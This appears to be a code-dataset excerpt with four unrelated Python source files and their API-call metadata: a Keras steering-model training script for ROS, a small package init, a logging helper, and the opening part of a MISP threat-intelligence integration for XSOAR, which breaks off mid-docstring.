[((9, 9, 9, 42), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((55, 9, 55, 42), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((60, 13, 60, 39), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((62, 13, 62, 26), 'sqlalchemy.Column', 'Column', ({(62, 20, 62, 25): 'Float'}, {}), '(Float)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((68, 9, 68, 42), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((71, 13, 71, 26), 'sqlalchemy.Column', 'Column', ({(71, 20, 71, 25): 'Float'}, {}), '(Float)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((77, 9, 77, 42), 'sqlalchemy.Column', 'Column', (), '', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((10, 24, 10, 35), 'sqlalchemy.String', 'String', ({(10, 31, 10, 34): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((11, 23, 11, 34), 'sqlalchemy.String', 'String', ({(11, 30, 11, 33): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((12, 19, 12, 30), 'sqlalchemy.String', 'String', ({(12, 26, 12, 29): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((13, 22, 13, 33), 'sqlalchemy.String', 'String', ({(13, 29, 13, 32): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((56, 21, 56, 31), 'sqlalchemy.String', 'String', ({(56, 28, 56, 30): '10'}, {}), '(10)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((57, 30, 57, 52), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(57, 41, 57, 51): '"""users.id"""'}, {}), "('users.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((61, 30, 61, 54), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(61, 41, 61, 53): '"""vendors.id"""'}, {}), "('vendors.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((69, 30, 69, 52), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(69, 41, 69, 51): '"""users.id"""'}, {}), "('users.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((70, 30, 70, 54), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(70, 41, 70, 53): '"""vendors.id"""'}, {}), "('vendors.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((78, 18, 78, 29), 'sqlalchemy.String', 'String', ({(78, 25, 78, 28): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((79, 23, 79, 34), 'sqlalchemy.String', 'String', ({(79, 30, 79, 33): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((80, 20, 80, 31), 'sqlalchemy.String', 'String', ({(80, 27, 80, 30): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((58, 57, 58, 80), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((72, 57, 72, 80), 'datetime.datetime.now', 
'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n')]
ebretl/roboracing-software
rr_ml/nodes/end_to_end/train.py
8803c97a885500069d04e70894b19f807ae5baf9
import os
import math
import string
import numpy as np
import rospy
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, \
    GaussianNoise, BatchNormalization
import cv2
import collections
import random
import time

from example_set import ExampleSet
from params import input_shape, expand_categories

n_examples_to_load = 8000  # if the number of training examples is below this, load more data
batch_size = 16

categories = [None]


def defineCategory(steering):
    differences = [abs(steering - category) for category in categories]
    category = np.argmin(differences)
    oneHot = [1 if i == category else 0 for i in range(len(categories))]
    return oneHot


def format_inputs(examples):
    data2 = np.zeros((len(examples),) + input_shape, dtype='float32')
    for i, ex in enumerate(examples):
        data2[i] = ex.get_image()
    data2 /= 255.0
    return data2


def make_model():
    model = Sequential()

    # 128 x 48
    model.add(GaussianNoise(0.05, input_shape=input_shape))
    model.add(Conv2D(32, (3, 3), activation='relu', padding='same'))
    model.add(MaxPooling2D((4, 4)))
    # 32 x 12
    model.add(Conv2D(64, (3, 3), activation='relu', padding='same'))
    model.add(MaxPooling2D((2, 2)))
    # 16 x 6

    model.add(Flatten())
    model.add(Dropout(0.25))
    model.add(Dense(128, activation='relu'))
    model.add(Dense(32, activation='relu'))
    model.add(Dropout(0.35))
    model.add(Dense(len(categories), activation='softmax'))

    model.compile(loss=keras.losses.categorical_crossentropy,
                  optimizer=keras.optimizers.Adadelta(),
                  metrics=['accuracy'])

    return model


def main():
    global categories, n_examples_to_load, batch_size

    rospy.init_node("nn_training")

    startTime = time.time()

    model_path = rospy.get_param("~model_output_path")
    exampleSetDir = rospy.get_param("~example_set_dir")
    epochs = int(rospy.get_param("~epochs"))

    categories = rospy.get_param("~positive_nonzero_categories")
    categories = string.strip(categories).split(" ")
    categories = [float(x) for x in categories]
    categories = expand_categories(categories)

    model = make_model()
    model.summary()

    exampleSetFiles_const = tuple(f for f in os.listdir(exampleSetDir) if '.pkl.lz4' in f)

    n_training_examples = 0
    n_test_examples = 0
    cnt = collections.Counter()
    for f in exampleSetFiles_const:
        data = ExampleSet.load(os.path.join(exampleSetDir, f))
        n_training_examples += len(data.train)
        n_test_examples += len(data.test)
        for ex in data.train:
            i = np.argmax(defineCategory(ex.angle))
            cnt[i] += 1

    print "total training examples:", n_training_examples
    print "training label counts:", cnt

    def batch_generator(isValidation = False):
        gen_epochs = 1 if isValidation else epochs
        for epoch in range(gen_epochs):
            exampleSetFiles = list(exampleSetFiles_const)
            random.shuffle(exampleSetFiles)

            while len(exampleSetFiles) > 0:
                D = []
                while len(exampleSetFiles) > 0 and len(D) < n_examples_to_load:
                    data = ExampleSet.load(os.path.join(exampleSetDir, exampleSetFiles.pop()))
                    D += data.test if isValidation else data.train

                if not isValidation:
                    random.shuffle(D)

                X = format_inputs(D)

                # create output bins
                labels = np.array([defineCategory(ex.angle) for ex in D])

                if not isValidation:
                    for i in range(len(X)):
                        if random.random() < 0.4:  # 40% of images are flipped
                            X[i] = cv2.flip(X[i], 1)
                            labels[i] = labels[i][::-1]

                for i in range(0, len(X), batch_size):
                    xs = X[i: i + batch_size]
                    ys = labels[i: i + batch_size]
                    yield (xs, ys)

    try:
        n_minibatches = int(math.ceil(float(n_training_examples) / batch_size))
        model.fit_generator(batch_generator(), steps_per_epoch=n_minibatches, epochs=epochs, verbose=1)

        print "elapsed time:", time.time() - startTime

        n_minibatches = int(math.ceil(float(n_test_examples) / batch_size))
        loss, acc = model.evaluate_generator(batch_generator(True), steps=n_minibatches)
        print "validation loss:", loss, "| validation accuracy:", acc

    finally:
        model.save(model_path)
        print "\nsaved model to", model_path
[]
heureka-code/Kronos-heureka-code
build/lib/Kronos_heureka_code/Zeit/__init__.py
0ddbc93ec69f0bc50075071e6a3e406c9cc97737
from Kronos_heureka_code.Zeit.Uhrzeit import Uhrzeit, Stunde, Minute, Sekunde
from Kronos_heureka_code.Zeit.Datum.Monat import Monate
from Kronos_heureka_code.Zeit.Datum.Jahr import Jahr, Zeitrechnung
from Kronos_heureka_code.Zeit.Datum.Tag import Tag
[]
cthoyt/retro_star
retro_star/utils/logger.py
280231eb2f5dffc0e14bed300d770977b323205a
import logging


def setup_logger(fname=None, silent=False):
    if fname is None:
        logging.basicConfig(
            level=logging.INFO if not silent else logging.CRITICAL,
            format='%(name)-12s: %(levelname)-8s %(message)s',
            datefmt='%m-%d %H:%M',
            filemode='w'
        )
    else:
        logging.basicConfig(
            level=logging.INFO if not silent else logging.CRITICAL,
            format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
            datefmt='%m-%d %H:%M',
            filename=fname,
            filemode='w'
        )

    console = logging.StreamHandler()
    console.setLevel(logging.INFO)
    formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
    console.setFormatter(formatter)
    logging.getLogger('').addHandler(console)
[((6, 8, 11, 9), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((13, 8, 19, 9), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((20, 18, 20, 41), 'logging.StreamHandler', 'logging.StreamHandler', ({}, {}), '()', False, 'import logging\n'), ((22, 20, 22, 81), 'logging.Formatter', 'logging.Formatter', ({(22, 38, 22, 80): '"""%(name)-12s: %(levelname)-8s %(message)s"""'}, {}), "('%(name)-12s: %(levelname)-8s %(message)s')", False, 'import logging\n'), ((24, 8, 24, 29), 'logging.getLogger', 'logging.getLogger', ({(24, 26, 24, 28): '""""""'}, {}), "('')", False, 'import logging\n')]
hiep4hiep/content
Packs/MISP/Integrations/MISPV3/MISPV3.py
f609c4c9548fe2188e8e2e00b2c9e80a74e24427
# type: ignore from typing import Union, List, Dict from urllib.parse import urlparse import urllib3 from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute from pymisp.tools import GenericObjectGenerator import copy from pymisp.tools import FileObject from CommonServerPython import * logging.getLogger("pymisp").setLevel(logging.CRITICAL) def handle_connection_errors(error): if "SSLError" in error: return_error('Unable to connect to MISP because of a SSLCertVerificationError, ' 'Please try to use the Trust any certificate option.') if "NewConnectionError" in error: return_error('Unable to connect to MISP because of a NewConnectionError, ' 'Please make sure your MISP server url is correct.') if "Please make sure the API key and the URL are correct" in error: return_error('Unable to connect to MISP, ' 'Please make sure the API key is correct.') return_error(error) def warn(*args): """ Do nothing with warnings """ pass # Disable requests warnings urllib3.disable_warnings() # Disable python warnings warnings.warn = warn ''' GLOBALS/PARAMS ''' params = demisto.params() if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')): raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.') MISP_URL = params.get('url') VERIFY = not params.get('insecure') PROXIES = handle_proxy() # type: ignore try: PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES) except PyMISPError as e: handle_connection_errors(e.message) PREDEFINED_FEEDS = { 'CIRCL': {'name': 'CIRCL OSINT Feed', 'url': 'https://www.circl.lu/doc/misp/feed-osint', 'format': 'misp', 'input': 'network'}, 'Botvrij.eu': {'name': 'The Botvrij.eu Data', 'url': 'http://www.botvrij.eu/data/feed-osint', 'format': 'misp', 'input': 'network'} } THREAT_LEVELS_TO_ID = { 'High': 1, 'Medium': 2, 'Low': 3, 'Unknown': 4 } MISP_ENTITIES_TO_CONTEXT_DATA = { 'deleted': 'Deleted', 'category': 'Category', 'comment': 'Comment', 'uuid': 'UUID', 'sharing_group_id': 'SharingGroupID', 'timestamp': 'LastChanged', 'to_ids': 'ToIDs', 'value': 'Value', 'event_id': 'EventID', 'ShadowAttribute': 'ShadowAttribute', 'disable_correlation': 'DisableCorrelation', 'distribution': 'Distribution', 'type': 'Type', 'id': 'ID', 'date': 'CreationDate', 'info': 'Info', 'published': 'Published', 'attribute_count': 'AttributeCount', 'proposal_email_lock': 'ProposalEmailLock', 'locked': 'Locked', 'publish_timestamp': 'PublishTimestamp', 'event_creator_email': 'EventCreatorEmail', 'name': 'Name', 'analysis': 'Analysis', 'threat_level_id': 'ThreatLevelID', 'old_id': 'OldID', 'org_id': 'OrganizationID', 'Org': 'Organization', 'Orgc': 'OwnerOrganization', 'orgc_uuid': 'OwnerOrganization.UUID', 'orgc_id': 'OwnerOrganization.ID', 'orgc_name': 'OwnerOrganization.Name', 'event_uuid': 'EventUUID', 'proposal_to_delete': 'ProposalToDelete', 'description': 'Description', 'version': 'Version', 'Object': 'Object', 'object_id': 'ObjectID', 'object_relation': 'ObjectRelation', 'template_version': 'TemplateVersion', 'template_uuid': 'TemplateUUID', 'meta-category': 'MetaCategory', 'decay_score': 'DecayScore', 'first_seen': 'first_seen', 'last_seen': 'last_seen', 'provider': 'Provider', 'source_format': 'SourceFormat', 'url': 'URL', 'event_uuids': 'EventUUIDS', } MISP_ANALYSIS_TO_IDS = { 'initial': 0, 'ongoing': 1, 'completed': 2 } MISP_DISTRIBUTION_TO_IDS = { 'Your_organization_only': 0, 'This_community_only': 1, 'Connected_communities': 2, 
'All_communities': 3, 'Inherit_event': 5 } SIGHTING_TYPE_NAME_TO_ID = { 'sighting': 0, 'false_positive': 1, 'expiration': 2 } SIGHTING_TYPE_ID_TO_NAME = { '0': 'sighting', '1': 'false_positive', '2': 'expiration' } INDICATOR_TYPE_TO_DBOT_SCORE = { 'FILE': DBotScoreType.FILE, 'URL': DBotScoreType.URL, 'DOMAIN': DBotScoreType.DOMAIN, 'IP': DBotScoreType.IP, 'EMAIL': DBotScoreType.EMAIL, } DOMAIN_REGEX = ( r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}" "[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*" "\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css" "|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$" "|localhost)" ) MISP_SEARCH_ARGUMENTS = [ 'value', 'type', 'category', 'org', 'tags', 'from', 'to', 'event_id', 'uuid', 'to_ids', 'last', 'include_decay_score', 'include_sightings', 'include_correlations', 'limit', 'page', 'enforceWarninglist', 'include_feed_correlations', ] EVENT_FIELDS = [ 'id', 'orgc_id', 'org_id', 'date', 'threat_level_id', 'info', 'published', 'uuid', 'analysis', 'attribute_count', 'timestamp', 'distribution', 'proposal_email_lock', 'locked', 'publish_timestamp', 'sharing_group_id', 'disable_correlation', 'event_creator_email', 'Org', 'Orgc', 'RelatedEvent', 'Galaxy', 'Tag', 'decay_score', 'Object', 'Feed', ] ATTRIBUTE_FIELDS = [ 'id', 'event_id', 'object_id', 'object_relation', 'category', 'type', 'to_ids', 'uuid', 'timestamp', 'distribution', 'sharing_group_id', 'comment', 'deleted', 'disable_correlation', 'first_seen', 'last_seen', 'value', 'Event', 'Object', 'Galaxy', 'Tag', 'decay_score', 'Sighting', ] def extract_error(error: list) -> List[dict]: """ Extracting errors raised by PYMISP into readable response, for more information and examples please see UT: test_extract_error. Args: error: list of responses from error section Returns: List[Dict[str, any]]: filtered response """ return [{ 'code': err[0], 'message': err[1].get('message'), 'errors': err[1].get('errors') } for err in error] def dict_to_generic_object_format(args: dict) -> List[dict]: """ Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp. Args: args: dictionary describes MISP object Returns: list: list containing dicts that GenericObjectGenerator can take. 
Examples: >>> {'ip': '8.8.8.8', 'domain': 'google.com'} [{'ip': '8.8.8.8'}, {'domain': 'google.com'}] """ return [{k: v} for k, v in args.items()] def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator: """ Args: template_name: template name as described in https://github.com/MISP/misp-objects args: arguments to create the generic object Returns: GenericObjectGenerator: object created in MISP Example: args should look like: [{'analysis_submitted_at': '2018-06-15T06:40:27'}, {'threat_score': {value=95, to_ids=False}}, {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'}, {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96}, {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line """ misp_object = GenericObjectGenerator(template_name) misp_object.generate_attributes(args) return misp_object def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str: """ Gets a timestamp from MISP response (1546713469) and converts it to human readable format """ return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else "" def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]: """ Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT) Args: obj_to_build (Union[dict, list, str]): object to replace keys in Returns: Union[dict, list, str]: same object type that got in """ if isinstance(obj_to_build, list): return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build] if isinstance(obj_to_build, dict): return { (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key): replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items() } return obj_to_build def reputation_command_to_human_readable(outputs, score, events_to_human_readable): found_tag_id, found_tag_name = "", "" for event in events_to_human_readable: # removing those fields as they are shared by the events found_tag_id = event.pop('Tag_ID') found_tag_name = event.pop('Tag_Name') return { 'Attribute Type': outputs[0].get('Type'), 'Dbot Score': score, 'Attribute Value': outputs[0].get('Value'), 'Attribute Category': outputs[0].get('Category'), 'Timestamp': outputs[0].get('Timestamp'), 'Events with the scored tag': events_to_human_readable, 'Scored Tag ID': found_tag_id, 'Scored Tag Name': found_tag_name, } def limit_tag_output_to_id_and_name(attribute_dict, is_event_level): """ As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields. In addition, returns set of the found tag ids. Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag. Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag. If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags (event ones and the event's attribute tags ones as it is part of the event scope). If the data is attribute's (is_event_level = false), and the tag is only related to an attribute we would like to add it to tag_set_ids. In any other case, we won't add the tag. Args: attribute_dict (dict): The dictionary that includes the tag list. is_event_level (bool): Whether the attribute_dict was received from an event object, meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags). 
""" output = [] tag_set_ids = set() tags_list = attribute_dict.get('Tag', []) for tag in tags_list: is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0' tag_id = tag.get('id') if is_event_level: tag_set_ids.add(tag_id) else: # attribute level if not is_event_tag: tag_set_ids.add(tag_id) output.append({'ID': tag_id, 'Name': tag.get('name')}) return output, tag_set_ids def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ After getting all the attributes which match the required indicator value, this function parses the response. This function goes over all the attributes that found (after limit the attributes amount to the given limit) and by sub-functions calculated the score of the indicator. For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects. Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are the newer ones. Returns: response (dict): The parsed outputs to context data (array of attributes). score: the indicator score found_tag: the tag (id) which made the indicator to get that score found_related_events (dict): contains info (name, id, threat level id) about all the events that include the indicator Please see an example for a response in test_data/reputation_command_response.json Please see an example for a parsed output in test_data/reputation_command_outputs.json """ response = copy.deepcopy(misp_response) attributes_list = response.get('Attribute') if not attributes_list: return None attributes_list = sorted(attributes_list, key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit] found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list) attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events) score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids, malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level) formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list}) return formatted_response, score, found_tag, found_related_events def prepare_attributes_array_to_context_data(attributes_list): attributes_tag_ids, event_tag_ids = set(), set() found_related_events = {} if not attributes_list: return None for attribute in attributes_list: attribute.pop("RelatedAttribute") # get rid of this useless list event = attribute.get('Event') convert_timestamp_to_readable(attribute, event) found_related_events[event.get("id")] = {"Event Name": event.get("info"), "Threat Level ID": event.get('threat_level_id'), "Event ID": event.get("id")} if event.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True) event['Tag'] = limit_tag_output event_tag_ids.update(tag_ids) if attribute.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False) attribute['Tag'] = limit_tag_output attributes_tag_ids.update(tag_ids) return found_related_events, attributes_tag_ids, event_tag_ids def convert_timestamp_to_readable(attribute, event): if attribute.get('timestamp'): attribute['timestamp'] = 
misp_convert_timestamp_to_date_string(attribute.get('timestamp')) if event: if event.get('timestamp'): attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp')) if event.get('publish_timestamp'): attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string( event.get('publish_timestamp')) def found_event_with_bad_threat_level_id(found_related_events): bad_threat_level_ids = ["1", "2", "3"] for event in found_related_events.values(): if event['Threat Level ID'] in bad_threat_level_ids: return True return False def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level): """ Calculates the indicator score by following logic. Indicators of attributes and Events that: * have tags which configured as malicious will be scored 3 (i.e malicious). * have tags which configured as suspicious will be scored 2 (i.e suspicious). * don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown. note: - In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will be scored as malicious. - Attributes tags (both malicious and suspicious) are stronger than events' tags. """ found_tag = None is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids) if is_attribute_tag_malicious: return Common.DBotScore.BAD, found_tag is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids) if is_attribute_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids) if is_event_tag_malicious: return Common.DBotScore.BAD, found_tag is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids) if is_event_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag # no tag was found if is_attribute_in_event_with_bad_threat_level: return Common.DBotScore.BAD, None return Common.DBotScore.NONE, None def get_new_misp_event_object(args): """ Create a new MISP event object and set the event's details. 
""" event = MISPEvent() event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')] threat_level_id_arg = args.get('threat_level_id') if threat_level_id_arg: event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg] analysis_arg = args.get('analysis') event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg event.info = args.get('info') if args.get('info') else 'Event from XSOAR' event.date = datetime.today() event.published = argToBoolean(args.get('published', 'False')) return event def create_event_command(demisto_args: dict): """Creating event in MISP with the given attribute args""" new_event = get_new_misp_event_object(demisto_args) new_event = PYMISP.add_event(new_event, True) if isinstance(new_event, dict) and new_event.get('errors'): raise DemistoException(new_event.get('errors')) event_id = new_event.id add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args) event = PYMISP.search(eventid=event_id) human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(event), raw_response=event ) def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None): """Adding attribute to a given MISP event object This function can be called as an independence command or as part of another command (create event for example) Args: event_id (int): Event ID to add attribute to internal (bool): if set to True, will not post results to Demisto demisto_args (dict): Demisto args new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to that existing event. """ attributes_args = { 'id': demisto_args.get('event_id'), # misp event id 'type': demisto_args.get('type', 'other'), 'category': demisto_args.get('category', 'External analysis'), 'to_ids': argToBoolean(demisto_args.get('to_ids', True)), 'comment': demisto_args.get('comment'), 'value': demisto_args.get('value') } event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id") attributes_args.update({'id': event_id}) if event_id else None distribution = demisto_args.get('distribution') attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None if not new_event: response = PYMISP.search(eventid=event_id, pythonify=True) if not response: raise DemistoException( f"Error: An event with the given id: {event_id} was not found in MISP. 
please check it once again") new_event = response[0] # response[0] is MISP event new_event.add_attribute(**attributes_args) PYMISP.update_event(event=new_event) if internal: return value = attributes_args.get('value') updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value) human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(updated_event), raw_response=updated_event ) def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): reputation_value_list = argToList(demisto_args.get(reputation_type), ',') command_results = [] for value in reputation_value_list: command_results.append( get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) return command_results def reputation_value_validation(value, dbot_type): if dbot_type == 'FILE': # hashFormat will be used only in output hash_format = get_hash_type(value) if hash_format == 'Unknown': raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256') if dbot_type == 'IP': if not is_ip_valid(value): raise DemistoException(f"Error: The given IP address: {value} is not valid") if dbot_type == 'DOMAIN': if not re.compile(DOMAIN_REGEX, regexFlags).match(value): raise DemistoException(f"Error: The given domain: {value} is not valid") if dbot_type == 'URL': if not re.compile(urlRegex, regexFlags).match(value): raise DemistoException(f"Error: The given url: {value} is not valid") if dbot_type == 'EMAIL': if not re.compile(emailRegex, regexFlags).match(value): raise DemistoException(f"Error: The given email address: {value} is not valid") def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): """ This function searches for the given attribute value in MISP and then calculates it's dbot score. The score is calculated by the tags ids (attribute tags and event tags). Args: value (str): The indicator value (an IP address, email address, domain, url or file hash). dbot_type (str): Indicator type (file, url, domain, email or ip). malicious_tag_ids (set): Tag ids should be recognised as malicious. suspicious_tag_ids (set): Tag ids should be recognised as suspicious reliability (DBotScoreReliability): integration reliability score. attributes_limit (int) : Limits the number of attributes that will be written to the context Returns: CommandResults includes all the indicator results. 
""" reputation_value_validation(value, dbot_type) misp_response = PYMISP.search(value=value, controller='attributes', include_context=True, include_correlations=True, include_event_tags=True, enforce_warninglist=True, include_decay_score=True, includeSightings=True) indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type] is_indicator_found = misp_response and misp_response.get('Attribute') if is_indicator_found: outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit) dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=score, reliability=reliability, malicious_description="Match found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) all_attributes = outputs.get('Attribute') events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag) attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable) readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights, removeNull=True) readable_output += tableToMarkdown('Related events', list(found_related_events.values())) return CommandResults(indicator=indicator, raw_response=misp_response, outputs=all_attributes, outputs_prefix='MISP.Attribute', outputs_key_field='ID', readable_output=readable_output) else: dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=Common.DBotScore.NONE, reliability=reliability, malicious_description="No results were found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) return CommandResults(indicator=indicator, readable_output=f"No attributes found in MISP for value: {value}") def get_events_related_to_scored_tag(all_attributes, found_tag): """ This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored as malicious or suspicious. Args: all_attributes (dict): The parsed response from the MISP search attribute request found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is Unknown so no events should be found. Returns: list includes all the events that were detected as related to the tag. """ scored_events = [] if found_tag: for attribute in all_attributes: event = attribute.get('Event', {}) event_name = event.get('Info') scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name)) scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name)) return remove_duplicated_related_events(scored_events) def remove_duplicated_related_events(related_events): related_events_no_duplicates = [] for i in range(len(related_events)): if related_events[i] not in related_events[i + 1:]: related_events_no_duplicates.append(related_events[i]) return related_events_no_duplicates def search_events_with_scored_tag(object_data_dict, found_tag, event_name): """ By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be added to related_events list Args: object_data_dict (dict): Event or attribute dict which includes tags list. found_tag (str): The tag that was scored as malicious or suspicious. 
